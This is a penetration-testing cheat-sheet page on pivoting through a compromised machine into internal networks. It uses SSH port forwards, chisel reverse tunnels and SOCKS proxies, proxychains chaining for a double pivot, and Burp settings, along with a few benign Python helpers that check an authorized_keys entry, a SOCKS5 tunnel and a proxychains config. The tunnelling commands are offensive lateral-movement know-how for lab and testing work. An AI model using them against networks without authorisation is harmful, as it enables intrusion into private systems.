d4Rk's 1337 h4x0r guide

Pivoting

Network setup

The following sections rely on this network setup.

┌──────────────┐          ┌──────────────┐            ┌──────────────┐
│ attacking    │          │ compromised  │            │ target       │
│ machine      │          │ machine      │            │ machine      │
│ (local)      │          │ (pivot)      │            │ (target)     │
│              │          │              │            │              │
│  10.10.10.2 ◄┼──public──┼► 10.10.10.5  │            │              │
│              │          │              │            │              │
│              │          │  172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │
│              │          │              │            │              │
└──────────────┘          └──────────────┘            └──────────────┘
Machine name           Short name   User
Attacking Machine      local        me
Compromised Machine    pivot        victim
Target Machine         target       -

SSH

Common options

option   description
-L       Forward connection (Local port forwarding)
-R       Reverse connection (Remote port forwarding)
-D       Socks proxy (Dynamic port forwarding)
-f       Immediately background the shell
-N       Only establish the connection, don't execute any commands

Forward connection (Local port forwarding)

  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │ssh -L 1337:172.16.0.10:80     │                   │
    ├──────────────────────────────►│                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │

Set up a local port forward to the target (local port 1337 is tunnelled through the pivot to 172.16.0.10:80).

ssh -L 1337:172.16.0.10:80 victim@10.10.10.5

Execute command

<cmd>

# Example
nc 127.0.0.1 1337

Reverse connection (Remote port forwarding)

  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │     ssh -R 1337:172.16.0.10:80│                   │
    │◄──────────────────────────────┤                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │

Because the pivot will connect back from the target network into our own machine, we need to take some precautions: the account the pivot logs into must be able to open the tunnel and nothing else.

  1. Generate a new ssh key pair

ssh-keygen

  2. Add the public key to authorized_keys with the following restrictions

from="<target-ip>",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <pub-key>

  3. Check the ssh server status

sudo systemctl status ssh

  4. Start the ssh server (if not already running)

sudo systemctl start ssh

  5. Copy the private key over to the pivot ⚠️ Normally we would never give away our private key, but that's why we're using a new throwaway key pair here! ⚠️
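Before the throwaway private key leaves the attacking machine, it is worth checking that the authorized_keys entry really carries every restriction from step 2. The following script is an added example, not part of the guide: it parses one OpenSSH authorized_keys line (options field, key type, key, comment), handling the commas and spaces that appear inside command="...", and reports which of the restrictions used above are missing. The sample entries and the key blob are constructed placeholders; the pinned source address 10.10.10.5 is the pivot from the network setup.

```python
import re

# Added example (not from the guide): parse an authorized_keys entry and check
# that the throwaway key carries the restrictions listed in step 2 before the
# private key is handed to the pivot. Only the OpenSSH authorized_keys syntax
# is assumed; the key material in the samples is a constructed placeholder.

KEY_TYPE = re.compile(
    r"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)"
    r"|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)$"
)

# Restrictions the guide applies; from= additionally has to pin the source IP.
REQUIRED = ("from=", "command=", "no-agent-forwarding", "no-X11-forwarding", "no-pty")


def _split_options(field):
    """Split the comma-separated options field; commas inside "..." are kept."""
    opts, cur, quoted = [], "", False
    for ch in field:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            opts.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        opts.append(cur)
    return opts


def parse_authorized_keys_line(line):
    """Return {'options', 'type', 'key', 'comment'} for one authorized_keys line."""
    line = line.strip()
    # The options field ends at the first whitespace outside double quotes,
    # because command="..." may itself contain spaces. Escaped quotes (\") are
    # not handled; the entries on this page do not use them.
    i, quoted = 0, False
    while i < len(line) and (quoted or not line[i].isspace()):
        if line[i] == '"':
            quoted = not quoted
        i += 1
    first, rest = line[:i], line[i:].split()
    if KEY_TYPE.match(first):                       # no options field at all
        return {"options": [], "type": first, "key": rest[0], "comment": " ".join(rest[1:])}
    return {"options": _split_options(first), "type": rest[0], "key": rest[1],
            "comment": " ".join(rest[2:])}


def missing_forward_only_restrictions(line, source_ip):
    """List the restrictions from REQUIRED that the entry lacks (empty list = OK).

    from= only counts when it pins exactly the expected source address.
    """
    opts = parse_authorized_keys_line(line)["options"]
    missing = []
    for name in REQUIRED:
        if name.endswith("="):
            present = any(o.startswith(name) for o in opts)
            if name == "from=" and f'from="{source_ip}"' not in opts:
                present = False
        else:
            present = name in opts
        if not present:
            missing.append(name)
    return missing


# Constructed sample entries; the key blob is a placeholder, not a real key.
PLACEHOLDER_KEY = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYMATERIAL0000000000000000"
                   " throwaway")
RESTRICTED = ('from="10.10.10.5",command="echo \'This account can only be used for port forwarding\'",'
              "no-agent-forwarding,no-X11-forwarding,no-pty " + PLACEHOLDER_KEY)
UNRESTRICTED = PLACEHOLDER_KEY

if __name__ == "__main__":
    for label, entry in (("restricted", RESTRICTED), ("unrestricted", UNRESTRICTED)):
        print(label, "missing:", missing_forward_only_restrictions(entry, "10.10.10.5"))
```

Run it against the real line you appended to ~/.ssh/authorized_keys (with the pivot's address as source_ip); an empty result means the key can only open the tunnel, a non-empty one names exactly what to add before copying the private key over.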

Set up a remote port forward from the pivot.

ssh -R 1337:172.16.0.10:80 me@10.10.10.2 -i throwaway-key

Execute command (example)

nc 127.0.0.1 1337

Socks proxy (Dynamic port forwarding)

  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │ssh -D 1337 [...]                │                   │
    ├────────────────────────────────►│                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │

Set up a SOCKS proxy that can forward any TCP port to any target reachable from the pivot.

ssh -D 1337 victim@10.10.10.5

proxychains.conf (see also below)

socks5 127.0.0.1 1337

Execute command (example)

proxychains nc 172.16.0.10 80

Socks proxy (reverse)

  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │                ssh -R 1337 [...]│                   │
    │◄────────────────────────────────┤                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │

Set up a reverse SOCKS proxy from the pivot (same throwaway key and proxychains.conf entry as above).

ssh -R 1337 me@10.10.10.2 -i throwaway-key

Chisel

Port forwarding

┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  9001 ─┼──port-forwarding──┼────────┼───┼► 80    │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │       ./chisel client 10.10.10.2:9000 [...]│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │nc 127.0.0.1 9001                           │                   │
    ├───────────────────────────────────────────►│        80         │
    │                                            ├──────────────────►│
    │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot)

./chisel client 10.10.10.2:9000 R:127.0.0.1:9001:172.16.0.10:80

Execute command (example)

nc 127.0.0.1 9001

SOCKS proxy

┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  1080 ─┼──SOCKS─proxy──────┼────────┼───┼► any   │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │proxychains nc 172.16.0.10 any              │                   │
    ├───────────────────────────────────────────►│        any        │
    │                                            ├──────────────────►│
    │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot)

./chisel client 10.10.10.2:9000 R:socks

Note: the listening port can be set explicitly as R:<socks-port>:socks; it defaults to 1080 if left out.

Execute command (example)

proxychains nc 172.16.0.10 80

Double pivot (via SOCKS proxies)

┌─subnet1───────────────────────────┐┌─subnet2───────────────────┐┌─subnet3───────────────┐
│                                   ││                           ││                       │
│  ┌─local──┐                   ┌─pivot1─┐                   ┌─pivot2─┐       ┌─target─┐  │
│  │        │                   │        │                   │        │       │        │  │
│  │  9000 ◄├──chisel───────────┤► 9000  │                   │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │        │                   │  9001 ◄├──chisel───────────┤► 9001  │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1080 ─┼──SOCKS─proxy──────┼────────┼─► any             │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1081 ─┼───────────────────┼────────┼──SOCKS─proxy──────┼────────┼─► any │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  └────────┘                   └────────┘                   └────────┘       └────────┘  │
│                                   ││                           ││                       │
└───────────────────────────────────┘└───────────────────────────┘└───────────────────────┘

  local                                        pivot                                       pivot2              target
10.10.10.2                                  10.10.10.5                                   172.16.0.10         172.16.1.20
                                            172.16.0.5                                   172.16.1.10         
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │./chisel server -p 9000 -reverse            │                                            │                   │
    ├──┐                                         │                                            │                   │
    │  │                                         │                                            │                   │
    │◄─┘                                         │                                            │                   │
    │                                            │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                                            │                   │
    │◄───────────────────────────────────────────┤                                            │                   │
    │                                            │                                            │                   │
    │                                            │./chisel server -p 9001 -reverse            │                   │
    │                                            ├──┐                                         │                   │
    │                                            │  │                                         │                   │
    │                                            │◄─┘                                         │                   │
    │                                            │                                            │                   │
    │                                            │     ./chisel client 172.16.0.5:9001 R:socks│                   │
    │                                            │◄───────────────────────────────────────────┤                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │proxychains nc <target-ip> any              │                                            │                   │
    ├───────────────────────────────────────────►│        any                                 │                   │
    │                                            ├───────────────────────────────────────────►│        any        │
    │                                            │                                            ├──────────────────►│
    │                                            │                                            │                   │

Start server (local)

./chisel server -p 9000 -reverse

Start client (pivot1)

./chisel client 10.10.10.2:9000 R:socks

Start another server (pivot1)

./chisel server -p 9001 -reverse

Start another client (pivot2)

./chisel client 172.16.0.5:9001 R:socks

Add the second proxy to proxychains.conf (see the proxychains section below for details)

socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

Execute command (example)

proxychains nc 172.16.1.20 80

Verify

netstat -tulpn

E.g.

[...]
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      50883/ssh
tcp6       0      0 ::1:1337                :::*                    LISTEN      50883/ssh
[...]
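netstat only shows that something is listening on the forwarded port. To confirm that a dynamic forward (ssh -D, or chisel with R:socks) actually accepts connections and can reach the target from the pivot side, the check below performs the SOCKS5 handshake from RFC 1928 (no-auth greeting, then a CONNECT request) and returns the proxy's reply code. This is an added example, not code from the guide or from ssh/chisel; the proxy address and target are assumptions matching the page's setup, and fake_socks5_server is a constructed stand-in for the pivot's SOCKS endpoint so the check can be exercised offline.

```python
import socket
import struct
import threading

# Added example (not from the guide): go one step past netstat and check that a
# dynamic forward (ssh -D, chisel R:socks) answers a SOCKS5 CONNECT (RFC 1928).
# A non-zero reply code means the proxy is up but the target is not reachable
# from the pivot, which netstat cannot tell you.

REPLY_MESSAGES = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; short reads happen even on loopback."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def socks5_connect_check(proxy_host, proxy_port, dst_host, dst_port, timeout=5.0):
    """Negotiate 'no authentication' and request CONNECT dst_host:dst_port.

    Returns the SOCKS5 reply code (0 = the proxy reached the target). A socket
    error instead means the proxy itself is not listening.
    """
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(b"\x05\x01\x00")                      # VER=5, NMETHODS=1, NO AUTH
        ver, method = _recv_exact(s, 2)
        if ver != 5 or method != 0x00:
            raise RuntimeError(f"proxy refused no-auth: ver={ver} method={method:#x}")
        # CONNECT with ATYP=DOMAINNAME (0x03) so the proxy resolves the name on
        # the pivot side, the equivalent of proxy_dns in proxychains.
        name = dst_host.encode()
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", dst_port))
        ver, code, _rsv, _atyp = _recv_exact(s, 4)      # rest of the reply is BND.ADDR/PORT
        if ver != 5:
            raise RuntimeError("malformed SOCKS5 reply")
        return code


def describe(proxy_host, proxy_port, dst_host, dst_port):
    """Human-readable one-liner for the result of socks5_connect_check."""
    code = socks5_connect_check(proxy_host, proxy_port, dst_host, dst_port)
    return f"{proxy_host}:{proxy_port} -> {dst_host}:{dst_port}: {REPLY_MESSAGES.get(code, code)}"


def fake_socks5_server(reachable_hosts):
    """Constructed stand-in for the pivot's SOCKS server so the check runs
    offline: serves one client, answers CONNECT with 0x00 for hosts in
    reachable_hosts and 0x05 (connection refused) otherwise. Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            _recv_exact(conn, 3)                         # greeting
            conn.sendall(b"\x05\x00")                    # NO AUTH selected
            hdr = _recv_exact(conn, 5)                   # VER CMD RSV ATYP LEN
            host = _recv_exact(conn, hdr[4]).decode()
            _recv_exact(conn, 2)                         # DST.PORT
            code = 0x00 if host in reachable_hosts else 0x05
            conn.sendall(bytes([0x05, code, 0x00, 0x01]) + b"\x00" * 6)  # BND.ADDR/PORT zeroed
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Offline demonstration; against a real tunnel use the forwarded port, e.g.
    # describe("127.0.0.1", 1337, "172.16.0.10", 80) after ssh -D 1337.
    port = fake_socks5_server({"172.16.0.10"})
    print(describe("127.0.0.1", port, "172.16.0.10", 80))
```

Against a live tunnel, replace the fake server with the real forwarded port: describe("127.0.0.1", 1337, "172.16.0.10", 80) after ssh -D 1337, or port 1080 after chisel R:socks. Reply 0x05 or 0x04 from a SOCKS proxy that is clearly up is the quickest way to tell a pivot-side reachability problem from a tunnel problem.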

proxychains

Config file

Proxychains looks for its configuration in the following order:

  1. Environment (PROXYCHAINS_CONF_FILE)

  2. -f proxychains.conf

  3. ./proxychains.conf

  4. ~/.proxychains/proxychains.conf

  5. /etc/proxychains.conf

Proxy entry (in the [ProxyList] section of the file)

socks5 127.0.0.1 1080

Run command via proxychains

proxychains <cmd>
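The parser below is an added example, not code from the guide or from proxychains: it reads a proxychains.conf (chain mode, flag and timeout options, and the [ProxyList] entries in the type/host/port[/user/pass] form used on this page) and then spells out the chaining rule that matters for the double pivot above. With more than one entry, proxychains connects to the hops in order and asks hop N to open the connection to hop N+1, so every address after the first entry is dialled from the previous proxy's host, not from the local machine. The sample configuration is constructed to mirror the double-pivot setup.

```python
# Added example (not from the guide or from proxychains itself): a parser for
# proxychains.conf as used on this page, plus a helper that states from which
# host each hop's address is dialled. The sample configuration is constructed.

CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain", "round_robin_chain")
PROXY_TYPES = ("socks4", "socks5", "http", "raw")

SAMPLE_CONF = """\
# constructed sample mirroring the double pivot on this page
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# type  host       port  [user pass]
socks5  127.0.0.1  1080
socks5  127.0.0.1  1081
"""


def parse_proxychains_conf(text):
    """Return {'chain_mode', 'options', 'proxies'}; chain_mode is None if unset."""
    cfg = {"chain_mode": None, "options": {}, "proxies": []}
    in_list = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
        elif in_list:
            parts = line.split()
            if len(parts) not in (3, 5) or parts[0] not in PROXY_TYPES:
                raise ValueError(f"bad proxy line: {raw!r}")
            entry = {"type": parts[0], "host": parts[1], "port": int(parts[2])}
            if len(parts) == 5:
                entry["user"], entry["password"] = parts[3], parts[4]
            cfg["proxies"].append(entry)
        elif line in CHAIN_MODES:
            cfg["chain_mode"] = line
        else:
            key, _, value = line.partition(" ")
            cfg["options"][key] = value.strip() or True   # flag-style options carry no value
    return cfg


def describe_hops(cfg):
    """One line per hop saying from which host that hop's address is dialled.

    In strict/dynamic/round-robin chains hop N+1 is opened through hop N, so a
    127.0.0.1 address in the second entry refers to loopback on the first
    proxy's host (the pivot), not on the local machine.
    """
    if cfg["chain_mode"] == "random_chain":
        return ["random_chain: hop order is randomised, so no fixed dialling host per entry"]
    lines, dialled_from = [], "local machine"
    for i, p in enumerate(cfg["proxies"], 1):
        lines.append(f"hop {i}: {p['type']} {p['host']}:{p['port']} dialled from {dialled_from}")
        dialled_from = f"the proxy behind hop {i}"
    return lines


if __name__ == "__main__":
    for line in describe_hops(parse_proxychains_conf(SAMPLE_CONF)):
        print(line)
```

For the double pivot this means the second entry has to name the port on pivot1 where pivot2's reverse SOCKS tunnel is exposed, which is why the listening port chosen with chisel's R:<socks-port>:socks on pivot2 and the port in the second proxychains entry must agree.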

Burp Suite

To use Burp Suite in this setup, just configure the socks proxy there.

Project options or User options → SOCKS Proxy → ☑️ Use SOCKS Proxy

  • SOCKS proxy host: 127.0.0.1

  • SOCKS proxy port: 1080

⚠️ Keep your browser pointing to Burp Suite's proxy as usual! ⚠️

Foxy Proxy

See Firefox extensions.

See

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP
GitHub - haad/proxychains: A tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.

Last updated 3 years ago